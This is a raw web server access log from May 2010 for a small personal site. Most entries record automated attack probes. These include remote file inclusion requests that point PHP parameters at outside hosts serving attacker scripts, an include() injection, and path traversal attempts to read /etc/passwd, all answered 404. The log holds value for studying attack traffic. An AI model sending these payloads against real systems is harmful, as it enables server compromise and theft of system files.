95.110.193.26 - - [06/May/2010:06:45:21 -0500] "GET /logs//index0.php?show=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
205.234.252.102 - - [06/May/2010:06:45:27 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.farmacialidercba.com.ar/admin/webalizer/1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
205.234.252.102 - - [06/May/2010:06:45:27 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.farmacialidercba.com.ar/admin/webalizer/1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
205.234.252.102 - - [06/May/2010:06:45:27 -0500] "GET /logs/access_log.1265673600//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.farmacialidercba.com.ar/admin/webalizer/1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
205.234.252.102 - - [06/May/2010:06:45:28 -0500] "GET /logs/access_log.1251504000//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.farmacialidercba.com.ar/admin/webalizer/1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
62.112.222.113 - - [06/May/2010:06:45:33 -0500] "GET /logs//index0.php?show=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
62.112.222.113 - - [06/May/2010:06:45:36 -0500] "GET //index0.php?show=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
207.46.13.52 - - [06/May/2010:06:45:52 -0500] "GET /logs/access_log.1267401600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
210.50.189.221 - - [06/May/2010:06:46:14 -0500] "GET /logs//index0.php?show=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
210.50.189.221 - - [06/May/2010:06:46:15 -0500] "GET //index0.php?show=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
81.31.157.143 - - [06/May/2010:06:46:19 -0500] "GET /logs/access_log.1270598400//index0.php?show=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
81.31.157.143 - - [06/May/2010:06:46:19 -0500] "GET //index0.php?show=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
81.31.157.143 - - [06/May/2010:06:46:19 -0500] "GET /logs//index0.php?show=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
62.112.222.113 - - [06/May/2010:06:46:31 -0500] "GET /logs/access_log.1270598400//index0.php?show=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
62.112.222.113 - - [06/May/2010:06:46:32 -0500] "GET //index0.php?show=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
62.112.222.113 - - [06/May/2010:06:46:32 -0500] "GET /logs//index0.php?show=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
212.13.159.138 - - [06/May/2010:06:46:55 -0500] "GET //index0.php?show=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
216.129.119.10 - - [06/May/2010:06:49:20 -0500] "GET /costume/links.htm HTTP/1.1" 200 1029 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
205.234.252.102 - - [06/May/2010:06:49:50 -0500] "GET /logs/access_log.1270598400%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.farmacialidercba.com.ar/admin/webalizer/1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
194.108.112.112 - - [06/May/2010:06:49:57 -0500] "GET /logs//index0.php?show=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
194.108.112.112 - - [06/May/2010:06:49:57 -0500] "GET //index0.php?show=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
210.50.189.221 - - [06/May/2010:06:51:10 -0500] "GET /logs/access_log.1270598400//index0.php?show=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
210.50.189.221 - - [06/May/2010:06:51:11 -0500] "GET //index0.php?show=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
193.218.152.83 - - [06/May/2010:06:51:11 -0500] "GET /logs/access_log.1270857600//index0.php?show=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
210.50.189.221 - - [06/May/2010:06:51:12 -0500] "GET /logs//index0.php?show=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
95.110.193.26 - - [06/May/2010:06:51:35 -0500] "GET /logs/access_log.1270857600//index0.php?show=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
87.250.255.243 - - [06/May/2010:06:52:00 -0500] "GET /logs/access_log.1252281600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
70.36.103.59 - - [06/May/2010:06:52:13 -0500] "GET /robots.txt HTTP/1.0" 404 282 "http://tomdolan.pconline.com/robots.txt""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
70.36.103.59 - - [06/May/2010:06:52:20 -0500] "GET / HTTP/1.0" 200 991 "http://tomdolan.pconline.com/""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
61.64.157.64 - - [06/May/2010:06:53:07 -0500] "GET /logs//index2.php?pagina=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
61.64.157.64 - - [06/May/2010:06:53:08 -0500] "GET //index2.php?pagina=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
212.13.159.138 - - [06/May/2010:06:56:02 -0500] "GET /logs//index0.php?show=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
212.13.159.138 - - [06/May/2010:06:56:04 -0500] "GET //index0.php?show=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
210.50.189.221 - - [06/May/2010:06:56:10 -0500] "GET /logs//index2.php?pagina=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
210.50.189.221 - - [06/May/2010:06:56:11 -0500] "GET //index2.php?pagina=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
207.46.204.234 - - [06/May/2010:06:56:52 -0500] "GET /logs/access_log.1260144000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
62.112.222.113 - - [06/May/2010:06:56:56 -0500] "GET /logs/access_log.1270857600//index0.php?show=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
81.31.157.143 - - [06/May/2010:06:57:05 -0500] "GET /logs/access_log.1270857600//index0.php?show=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
164.77.228.201 - - [06/May/2010:06:58:12 -0500] "GET /logs//content/multithumb/multithumb.php?mosConfig.absolute.path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
164.77.228.201 - - [06/May/2010:06:58:12 -0500] "GET //content/multithumb/multithumb.php?mosConfig.absolute.path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
164.77.228.201 - - [06/May/2010:06:58:12 -0500] "GET /logs/access_log.1272067200%20%20//content/multithumb/multithumb.php?mosConfig.absolute.path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
212.13.159.138 - - [06/May/2010:06:58:19 -0500] "GET /logs/access_log.1270598400//index0.php?show=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
207.46.204.194 - - [06/May/2010:06:58:22 -0500] "GET /logs/access_log.1174780800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
212.13.159.138 - - [06/May/2010:06:58:23 -0500] "GET //index0.php?show=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
212.13.159.138 - - [06/May/2010:06:58:27 -0500] "GET /logs//index0.php?show=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
194.108.112.112 - - [06/May/2010:06:58:41 -0500] "GET /logs/access_log.1270598400//index0.php?show=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
194.108.112.112 - - [06/May/2010:06:58:41 -0500] "GET //index0.php?show=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
194.108.112.112 - - [06/May/2010:06:58:42 -0500] "GET /logs//index0.php?show=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
67.222.129.26 - - [06/May/2010:06:59:10 -0500] "GET /logs/access_log.1212451200%20%20//content/multithumb/multithumb.php?mosConfig.absolute.path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
67.222.129.26 - - [06/May/2010:06:59:10 -0500] "GET //content/multithumb/multithumb.php?mosConfig.absolute.path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
67.222.129.26 - - [06/May/2010:06:59:10 -0500] "GET /logs//content/multithumb/multithumb.php?mosConfig.absolute.path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
67.222.129.26 - - [06/May/2010:06:59:10 -0500] "GET /logs/access_log.1211760000%20%20//content/multithumb/multithumb.php?mosConfig.absolute.path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
217.172.150.13 - - [06/May/2010:06:59:43 -0500] "GET /logs/access_log.1270857600//index0.php?show=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 322 "-""libwww-perl/5.825"
207.46.199.189 - - [06/May/2010:07:00:51 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
210.50.189.221 - - [06/May/2010:07:03:09 -0500] "GET /logs/access_log.1270857600//index0.php?show=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
207.46.204.237 - - [06/May/2010:07:04:52 -0500] "GET /logs/access_log.1199318400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
200.11.75.68 - - [06/May/2010:07:05:21 -0500] "GET /logs//npovorg_bbs///skin/zero_vote/ask_password.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
200.11.75.68 - - [06/May/2010:07:05:21 -0500] "GET /logs/access_log.1245283200//npovorg_bbs///skin/zero_vote/ask_password.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 357 "-""Mozilla/5.0"
200.11.75.68 - - [06/May/2010:07:05:21 -0500] "GET //npovorg_bbs///skin/zero_vote/ask_password.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
200.11.75.68 - - [06/May/2010:07:05:46 -0500] "GET /logs//npovorg_bbs///skin/zero_vote/ask_password.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
200.11.75.68 - - [06/May/2010:07:05:46 -0500] "GET /logs/access_log.1245283200//npovorg_bbs///skin/zero_vote/ask_password.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 357 "-""Mozilla/5.0"
200.11.75.68 - - [06/May/2010:07:05:47 -0500] "GET //npovorg_bbs///skin/zero_vote/ask_password.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
200.11.75.68 - - [06/May/2010:07:05:47 -0500] "GET /logs//npovorg_bbs///skin/zero_vote/ask_password.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
200.11.75.68 - - [06/May/2010:07:05:47 -0500] "GET /logs/access_log.1245283200//npovorg_bbs///skin/zero_vote/ask_password.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 357 "-""Mozilla/5.0"
200.11.75.68 - - [06/May/2010:07:05:47 -0500] "GET //npovorg_bbs///skin/zero_vote/ask_password.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
200.11.75.68 - - [06/May/2010:07:05:48 -0500] "GET //npovorg_bbs///skin/zero_vote/ask_password.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
200.11.75.68 - - [06/May/2010:07:05:48 -0500] "GET /logs/access_log.1245283200//npovorg_bbs///skin/zero_vote/ask_password.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 357 "-""Mozilla/5.0"
200.11.75.68 - - [06/May/2010:07:05:48 -0500] "GET /logs//npovorg_bbs///skin/zero_vote/ask_password.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
200.11.75.68 - - [06/May/2010:07:05:58 -0500] "GET //npovorg_bbs///skin/zero_vote/ask_password.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
200.11.75.68 - - [06/May/2010:07:05:58 -0500] "GET /logs/access_log.1245283200//npovorg_bbs///skin/zero_vote/ask_password.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 357 "-""Mozilla/5.0"
200.11.75.68 - - [06/May/2010:07:05:58 -0500] "GET /logs//npovorg_bbs///skin/zero_vote/ask_password.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
87.250.255.243 - - [06/May/2010:07:07:07 -0500] "GET /logs/access_log.1261094400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
65.55.51.70 - - [06/May/2010:07:08:39 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.51.70 - - [06/May/2010:07:09:20 -0500] "GET /logs/access_log.1183248000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
194.108.112.112 - - [06/May/2010:07:13:40 -0500] "GET /logs/access_log.1270857600//index0.php?show=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
67.205.38.15 - - [06/May/2010:07:18:49 -0500] "GET /logs/access_log.1265673600/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
67.205.38.15 - - [06/May/2010:07:18:49 -0500] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
67.205.38.15 - - [06/May/2010:07:18:49 -0500] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
203.251.80.167 - - [06/May/2010:07:19:26 -0500] "GET /solpot.html?body=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
203.251.80.167 - - [06/May/2010:07:19:26 -0500] "GET /logs/access_log.1265673600/solpot.html?body=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
203.251.80.167 - - [06/May/2010:07:19:26 -0500] "GET /logs/solpot.html?body=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
203.251.80.167 - - [06/May/2010:07:19:26 -0500] "GET /logs/access_log.1265500800/solpot.html?body=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
203.251.80.167 - - [06/May/2010:07:19:31 -0500] "GET /solpot.html?body=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
203.251.80.167 - - [06/May/2010:07:19:31 -0500] "GET /logs/access_log.1265673600/solpot.html?body=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
203.251.80.167 - - [06/May/2010:07:19:31 -0500] "GET /logs/solpot.html?body=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
203.251.80.167 - - [06/May/2010:07:19:31 -0500] "GET /logs/access_log.1265500800/solpot.html?body=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
222.236.47.182 - - [06/May/2010:07:22:06 -0500] "GET /logs/avatar.php?page=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
222.236.47.182 - - [06/May/2010:07:22:06 -0500] "GET /avatar.php?page=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
222.236.47.182 - - [06/May/2010:07:22:06 -0500] "GET /logs/access_log.1270857600%20%20/avatar.php?page=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
222.236.47.182 - - [06/May/2010:07:22:35 -0500] "GET /logs/avatar.php?page=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
222.236.47.182 - - [06/May/2010:07:22:35 -0500] "GET /avatar.php?page=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
222.236.47.182 - - [06/May/2010:07:22:35 -0500] "GET /logs/access_log.1270857600%20%20/avatar.php?page=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
115.68.20.197 - - [06/May/2010:07:23:36 -0500] "GET /logs/access_log.1270857600/avatar.php?page=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
115.68.20.197 - - [06/May/2010:07:23:38 -0500] "GET /logs/avatar.php?page=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
115.68.20.197 - - [06/May/2010:07:23:38 -0500] "GET /avatar.php?page=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
67.195.112.180 - - [06/May/2010:07:23:51 -0500] "GET /logs/access_log.1219622400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
124.115.6.16 - - [06/May/2010:07:24:02 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Sosospider+(+http://help.soso.com/webspider.htm)"
115.68.20.197 - - [06/May/2010:07:24:05 -0500] "GET /avatar.php?page=http://www.thaismecity.com/thaismejob/include/idv6.txt???? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
115.68.20.197 - - [06/May/2010:07:24:06 -0500] "GET /logs/avatar.php?page=http://www.thaismecity.com/thaismejob/include/idv6.txt???? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
115.68.20.197 - - [06/May/2010:07:24:06 -0500] "GET /logs/access_log.1270857600/avatar.php?page=http://www.thaismecity.com/thaismejob/include/idv6.txt???? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
212.13.159.138 - - [06/May/2010:07:27:14 -0500] "GET /logs/access_log.1270857600//index0.php?show=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
207.46.204.197 - - [06/May/2010:07:27:52 -0500] "GET /logs/access_log.1194307200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [06/May/2010:07:28:04 -0500] "GET /logs/access_log.1235952000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.195.231 - - [06/May/2010:07:28:52 -0500] "GET /logs/access_log.1227139200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.218.116.130 - - [06/May/2010:07:31:29 -0500] "GET /logs/access_log.1222992000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
67.218.116.130 - - [06/May/2010:07:32:44 -0500] "GET /logs/access_log.1219536000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
193.218.152.83 - - [06/May/2010:07:39:00 -0500] "GET /logs//index3.php?pag=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
193.218.152.83 - - [06/May/2010:07:39:00 -0500] "GET //index3.php?pag=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
217.172.150.13 - - [06/May/2010:07:39:35 -0500] "GET /logs//index3.php?pag=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 300 "-""libwww-perl/5.825"
217.172.150.13 - - [06/May/2010:07:39:35 -0500] "GET //index3.php?pag=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 295 "-""libwww-perl/5.825"
62.112.222.113 - - [06/May/2010:07:39:48 -0500] "GET /logs//index3.php?pag=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
62.112.222.113 - - [06/May/2010:07:39:49 -0500] "GET //index3.php?pag=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
212.41.220.210 - - [06/May/2010:07:40:19 -0500] "GET /logs//index3.php?pag=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
212.41.220.210 - - [06/May/2010:07:40:20 -0500] "GET //index3.php?pag=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
194.108.112.112 - - [06/May/2010:07:42:03 -0500] "GET /logs//index3.php?pag=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
194.108.112.112 - - [06/May/2010:07:42:04 -0500] "GET //index3.php?pag=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
61.64.157.64 - - [06/May/2010:07:42:24 -0500] "GET /logs//index3.php?pag=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
61.64.157.64 - - [06/May/2010:07:42:24 -0500] "GET //index3.php?pag=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
210.50.189.221 - - [06/May/2010:07:42:27 -0500] "GET /logs//index3.php?pag=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
210.50.189.221 - - [06/May/2010:07:42:27 -0500] "GET //index3.php?pag=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
81.31.157.143 - - [06/May/2010:07:42:51 -0500] "GET /logs//index3.php?pag=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
81.31.157.143 - - [06/May/2010:07:42:51 -0500] "GET //index3.php?pag=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
164.77.228.201 - - [06/May/2010:07:43:07 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0"
164.77.228.201 - - [06/May/2010:07:43:07 -0500] "GET /logs/access_log.1217376000//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
164.77.228.201 - - [06/May/2010:07:43:07 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
87.250.255.243 - - [06/May/2010:07:43:19 -0500] "GET /logs/access_log.1225497600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
95.110.193.26 - - [06/May/2010:07:44:26 -0500] "GET /logs//index3.php?pag=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
95.110.193.26 - - [06/May/2010:07:44:27 -0500] "GET //index3.php?pag=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
207.46.13.94 - - [06/May/2010:07:48:52 -0500] "GET /logs/access_log.1229990400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.195.233 - - [06/May/2010:07:49:23 -0500] "GET /logs/access_log.1268092800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.249.71.205 - - [06/May/2010:07:54:11 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
87.250.255.243 - - [06/May/2010:07:58:32 -0500] "GET /logs/access_log.1249344000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
110.164.236.68 - - [06/May/2010:07:58:50 -0500] "GET /tattoo/tat-cd1.jpg HTTP/1.1" 200 67733 "http://www.google.co.th/imglanding?q=vintage%20tattoo&imgurl=http://tomdolan.pconline.com/tattoo/tat-cd1.jpg&imgrefurl=http://tomdolan.pconline.com/tattoo/tattoo-order.htm&usg=__JZaxpk5VGgymRTkUijnNt2CO7UE=&h=364&w=405&sz=67&hl=th&um=1&itbs=1&tbnid=l48fMOZCNyJY3M:&tbnh=111&tbnw=124&prev=/images%3Fq%3Dvintage%2Btattoo%26start%3D72%26um%3D1%26hl%3Dth%26sa%3DN%26ndsp%3D18%26tbs%3Disch:1&start=71&um=1&sa=N&ndsp=18&tbs=isch:1""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1)"
109.166.133.81 - - [06/May/2010:07:59:50 -0500] "GET /logs/ HTTP/1.1" 200 4495 "http://annysoft.wordpress.com/""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
109.166.133.81 - - [06/May/2010:07:59:51 -0500] "GET /icons/back.gif HTTP/1.1" 200 216 "http://tomdolan.pconline.com/logs/""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
109.166.133.81 - - [06/May/2010:07:59:51 -0500] "GET /icons/blank.gif HTTP/1.1" 200 148 "http://tomdolan.pconline.com/logs/""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
109.166.133.81 - - [06/May/2010:07:59:51 -0500] "GET /icons/text.gif HTTP/1.1" 200 229 "http://tomdolan.pconline.com/logs/""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
109.166.133.81 - - [06/May/2010:07:59:52 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
